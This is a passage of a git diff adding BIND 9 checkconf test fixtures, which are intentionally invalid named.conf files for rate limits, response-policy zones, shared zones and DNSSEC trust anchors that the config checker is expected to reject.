a/bin/tests/system/checkconf/bad-rate-limit-all-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-all-per-second.conf new file mode 100644 index 0000000..aae353e --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-all-per-second.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + all-per-second 1001; // greater than DNS_RRL_MAX_RATE + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-errors-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-errors-per-second.conf new file mode 100644 index 0000000..b2c6097 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-errors-per-second.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + errors-per-second 1001; // greater than DNS_RRL_MAX_RATE + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-ipv4-prefix-length.conf b/bin/tests/system/checkconf/bad-rate-limit-ipv4-prefix-length.conf new file mode 100644 index 0000000..b728575 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-ipv4-prefix-length.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + ipv4-prefix-length 33; // greater than bits in address + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-ipv6-prefix-length.conf b/bin/tests/system/checkconf/bad-rate-limit-ipv6-prefix-length.conf new file mode 100644 index 0000000..6b5fda5 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-ipv6-prefix-length.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + ipv6-prefix-length 65; // max 64 + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-max-table-size.conf b/bin/tests/system/checkconf/bad-rate-limit-max-table-size.conf new file mode 100644 index 0000000..95309db --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-max-table-size.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + max-table-size 30; // less than min-table-size default of 500 + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-nodata-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-nodata-per-second.conf new file mode 100644 index 0000000..ecfb5f8 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-nodata-per-second.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + nodata-per-second 1001; // greater than DNS_RRL_MAX_RATE + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-nxdomains-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-nxdomains-per-second.conf new file mode 100644 index 0000000..77c5749 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-nxdomains-per-second.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + nxdomains-per-second 1001; // greater than DNS_RRL_MAX_RATE + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-qps-scale.conf b/bin/tests/system/checkconf/bad-rate-limit-qps-scale.conf new file mode 100644 index 0000000..0dc4532 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-qps-scale.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + qps-scale 0; // must be greater than zero + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-referrals-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-referrals-per-second.conf new file mode 100644 index 0000000..0ea4836 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-referrals-per-second.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + referrals-per-second 1001; // greater than DNS_RRL_MAX_RATE + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-responses-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-responses-per-second.conf new file mode 100644 index 0000000..8187244 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-responses-per-second.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + responses-per-second 1001; // greater than DNS_RRL_MAX_RATE + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-slip.conf b/bin/tests/system/checkconf/bad-rate-limit-slip.conf new file mode 100644 index 0000000..15d270c --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-slip.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + slip 11; // greater than default of 10 + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-window.conf b/bin/tests/system/checkconf/bad-rate-limit-window.conf new file mode 100644 index 0000000..7ded786 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-window.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + window 3601; // greater than default of 3600 + }; +}; diff --git a/bin/tests/system/checkconf/bad-root-mixed-key.conf b/bin/tests/system/checkconf/bad-root-mixed-key.conf new file mode 100644 index 0000000..7035066 --- /dev/null +++ b/bin/tests/system/checkconf/bad-root-mixed-key.conf @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + # This key (19036) is to be phased out starting in 2017. It will + # remain in the root zone for some time after its successor key + # has been added. It will remain this file until it is removed from + # the root zone. + . static-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF + FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX + bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD + X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz + W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS + Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq + QxA+Uk1ihz0="; + + # This key (20326) was published in the root zone in 2017. + # Servers which were already using the old key (19036) should + # roll seamlessly to this new one via RFC 5011 rollover. Servers + # being set up for the first time can use the contents of this + # file as initializing keys; thereafter, the keys in the + # managed key database will be trusted and maintained + # automatically. + . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/bin/tests/system/checkconf/bad-rpz-too-many-zones.conf b/bin/tests/system/checkconf/bad-rpz-too-many-zones.conf new file mode 100644 index 0000000..9861529 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rpz-too-many-zones.conf @@ -0,0 +1,148 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + response-policy { + zone "max1"; + zone "max2"; + zone "max3"; + zone "max4"; + zone "max5"; + zone "max6"; + zone "max7"; + zone "max8"; + zone "max9"; + zone "max10"; + zone "max11"; + zone "max12"; + zone "max13"; + zone "max14"; + zone "max15"; + zone "max16"; + zone "max17"; + zone "max18"; + zone "max19"; + zone "max20"; + zone "max21"; + zone "max22"; + zone "max23"; + zone "max24"; + zone "max25"; + zone "max26"; + zone "max27"; + zone "max28"; + zone "max29"; + zone "max30"; + zone "max31"; + zone "max32"; + zone "max33"; + zone "max34"; + zone "max35"; + zone "max36"; + zone "max37"; + zone "max38"; + zone "max39"; + zone "max40"; + zone "max41"; + zone "max42"; + zone "max43"; + zone "max44"; + zone "max45"; + zone "max46"; + zone "max47"; + zone "max48"; + zone "max49"; + zone "max50"; + zone "max51"; + zone "max52"; + zone "max53"; + zone "max54"; + zone "max55"; + zone "max56"; + zone "max57"; + zone "max58"; + zone "max59"; + zone "max60"; + zone "max61"; + zone "max62"; + zone "max63"; + zone "max64"; + zone "max65"; + }; +}; + +zone "max1" { type master; file "rpz.db"; }; +zone "max2" { type master; file "rpz.db"; }; +zone "max3" { type master; file "rpz.db"; }; +zone "max4" { type master; file "rpz.db"; }; +zone "max5" { type master; file "rpz.db"; }; +zone "max6" { type master; file "rpz.db"; }; +zone "max7" { type master; file "rpz.db"; }; +zone "max8" { type master; file "rpz.db"; }; +zone "max9" { type master; file "rpz.db"; }; +zone "max10" { type master; file "rpz.db"; }; +zone "max11" { type master; file "rpz.db"; }; +zone "max12" { type master; file "rpz.db"; }; +zone "max13" { type master; file "rpz.db"; }; +zone "max14" { type master; file "rpz.db"; }; +zone "max15" { type master; file "rpz.db"; }; +zone "max16" { type master; file "rpz.db"; }; +zone "max17" { type master; file "rpz.db"; }; +zone "max18" { type master; file "rpz.db"; }; +zone "max19" { type master; file "rpz.db"; }; +zone "max20" { type master; file "rpz.db"; }; +zone "max21" { type master; file "rpz.db"; }; +zone "max22" { type master; file "rpz.db"; }; +zone "max23" { type master; file "rpz.db"; }; +zone "max24" { type master; file "rpz.db"; }; +zone "max25" { type master; file "rpz.db"; }; +zone "max26" { type master; file "rpz.db"; }; +zone "max27" { type master; file "rpz.db"; }; +zone "max28" { type master; file "rpz.db"; }; +zone "max29" { type master; file "rpz.db"; }; +zone "max30" { type master; file "rpz.db"; }; +zone "max31" { type master; file "rpz.db"; }; +zone "max32" { type master; file "rpz.db"; }; +zone "max33" { type master; file "rpz.db"; }; +zone "max34" { type master; file "rpz.db"; }; +zone "max35" { type master; file "rpz.db"; }; +zone "max36" { type master; file "rpz.db"; }; +zone "max37" { type master; file "rpz.db"; }; +zone "max38" { type master; file "rpz.db"; }; +zone "max39" { type master; file "rpz.db"; }; +zone "max40" { type master; file "rpz.db"; }; +zone "max41" { type master; file "rpz.db"; }; +zone "max42" { type master; file "rpz.db"; }; +zone "max43" { type master; file "rpz.db"; }; +zone "max44" { type master; file "rpz.db"; }; +zone "max45" { type master; file "rpz.db"; }; +zone "max46" { type master; file "rpz.db"; }; +zone "max47" { type master; file "rpz.db"; }; +zone "max48" { type master; file "rpz.db"; }; +zone "max49" { type master; file "rpz.db"; }; +zone "max50" { type master; file "rpz.db"; }; +zone "max51" { type master; file "rpz.db"; }; +zone "max52" { type master; file "rpz.db"; }; +zone "max53" { type master; file "rpz.db"; }; +zone "max54" { type master; file "rpz.db"; }; +zone "max55" { type master; file "rpz.db"; }; +zone "max56" { type master; file "rpz.db"; }; +zone "max57" { type master; file "rpz.db"; }; +zone "max58" { type master; file "rpz.db"; }; +zone "max59" { type master; file "rpz.db"; }; +zone "max60" { type master; file "rpz.db"; }; +zone "max61" { type master; file "rpz.db"; }; +zone "max62" { type master; file "rpz.db"; }; +zone "max63" { type master; file "rpz.db"; }; +zone "max64" { type master; file "rpz.db"; }; +zone "max65" { type master; file "rpz.db"; }; diff --git a/bin/tests/system/checkconf/bad-rpz-ttl.conf b/bin/tests/system/checkconf/bad-rpz-ttl.conf new file mode 100644 index 0000000..d54bba9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rpz-ttl.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com." { + type master; + file "example.com.zone"; +}; + +options { + response-policy { + zone "example.com." policy given; + } + max-policy-ttl 1x; +}; diff --git a/bin/tests/system/checkconf/bad-rpz-update.conf b/bin/tests/system/checkconf/bad-rpz-update.conf new file mode 100644 index 0000000..304b46c --- /dev/null +++ b/bin/tests/system/checkconf/bad-rpz-update.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com." { + type master; + file "example.com.zone"; +}; + +options { + response-policy { + zone "example.com." + policy given + min-update-interval 5x; + }; +}; diff --git a/bin/tests/system/checkconf/bad-rpz-zone.conf b/bin/tests/system/checkconf/bad-rpz-zone.conf new file mode 100644 index 0000000..4aadc61 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rpz-zone.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + response-policy { + zone "nonexistent"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-sharedwritable1.conf b/bin/tests/system/checkconf/bad-sharedwritable1.conf new file mode 100644 index 0000000..e646b91 --- /dev/null +++ b/bin/tests/system/checkconf/bad-sharedwritable1.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone a { + type master; + file "shared.db"; +}; +zone b { + type slave; + file "shared.db"; + masters { 1.2.3.4; }; +}; diff --git a/bin/tests/system/checkconf/bad-sharedwritable2.conf b/bin/tests/system/checkconf/bad-sharedwritable2.conf new file mode 100644 index 0000000..2224053 --- /dev/null +++ b/bin/tests/system/checkconf/bad-sharedwritable2.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone a { + type slave; + file "shared.db"; + masters { 1.2.3.4; }; +}; +zone b { + type slave; + file "shared.db"; + masters { 1.2.3.4; }; +}; diff --git a/bin/tests/system/checkconf/bad-sharedzone1.conf b/bin/tests/system/checkconf/bad-sharedzone1.conf new file mode 100644 index 0000000..a8255ad --- /dev/null +++ b/bin/tests/system/checkconf/bad-sharedzone1.conf @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "first" { + match-clients { + "none"; + }; + zone "clone" { + type master; + file "xxx"; + }; +}; +view "second" { + match-clients { + "any"; + }; + zone "clone" { + in-view "first"; + type slave; + }; +}; diff --git a/bin/tests/system/checkconf/bad-sharedzone2.conf b/bin/tests/system/checkconf/bad-sharedzone2.conf new file mode 100644 index 0000000..fbe601a --- /dev/null +++ b/bin/tests/system/checkconf/bad-sharedzone2.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "first" { + match-clients { + "none"; + }; + zone "clone" { + type master; + file "xxx"; + }; +}; +view "second" { + match-clients { + "any"; + }; + zone "clone" { + in-view "first"; + forward only; + forwarders { 10.0.0.100; }; + type slave; + }; +}; diff --git a/bin/tests/system/checkconf/bad-sharedzone3.conf b/bin/tests/system/checkconf/bad-sharedzone3.conf new file mode 100644 index 0000000..2adc554 --- /dev/null +++ b/bin/tests/system/checkconf/bad-sharedzone3.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view first { + zone shared.example { + in-view second; + }; +}; + +view second { + zone shared.example { + type master; + file "shared.example.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-sig-validity.conf b/bin/tests/system/checkconf/bad-sig-validity.conf new file mode 100644 index 0000000..1744eba --- /dev/null +++ b/bin/tests/system/checkconf/bad-sig-validity.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + sig-validity-interval 5000; +}; diff --git a/bin/tests/system/checkconf/bad-static-initial-1.conf b/bin/tests/system/checkconf/bad-static-initial-1.conf new file mode 100644 index 0000000..91a5c10 --- /dev/null +++ b/bin/tests/system/checkconf/bad-static-initial-1.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. initial-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3"; + example. static-ds 60724 5 2 "29E79B9064EE1A11DF3BFF19581DDFED7952C22CC204ACE17B6007EB1437E9E6"; +}; diff --git a/bin/tests/system/checkconf/bad-static-initial-2.conf b/bin/tests/system/checkconf/bad-static-initial-2.conf new file mode 100644 index 0000000..3b4754d --- /dev/null +++ b/bin/tests/system/checkconf/bad-static-initial-2.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. initial-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3"; + example. static-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/bad-static-initial-3.conf b/bin/tests/system/checkconf/bad-static-initial-3.conf new file mode 100644 index 0000000..c396d9c --- /dev/null +++ b/bin/tests/system/checkconf/bad-static-initial-3.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. static-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3"; + example. initial-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/bad-static-initial-4.conf b/bin/tests/system/checkconf/bad-static-initial-4.conf new file mode 100644 index 0000000..2170d52 --- /dev/null +++ b/bin/tests/system/checkconf/bad-static-initial-4.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + example. initial-key 257 3 5 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafGtURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJYkYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJfpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaSWG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjINQyrszHhWUU="; + example. static-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/bad-stub-masters-dialup.conf b/bin/tests/system/checkconf/bad-stub-masters-dialup.conf new file mode 100644 index 0000000..9944e82 --- /dev/null +++ b/bin/tests/system/checkconf/bad-stub-masters-dialup.conf @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port 5300; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + heartbeat-interval 2; + recursion no; +}; +zone "." { + type hint; + file "hint"; +}; +zone "example." { + type stub; + dialup notify; + notify no; + file "example.bk"; + // masters { 10.53.0.1; }; +}; diff --git a/bin/tests/system/checkconf/bad-transfer-source-v6.conf b/bin/tests/system/checkconf/bad-transfer-source-v6.conf new file mode 100644 index 0000000..da182ff --- /dev/null +++ b/bin/tests/system/checkconf/bad-transfer-source-v6.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at 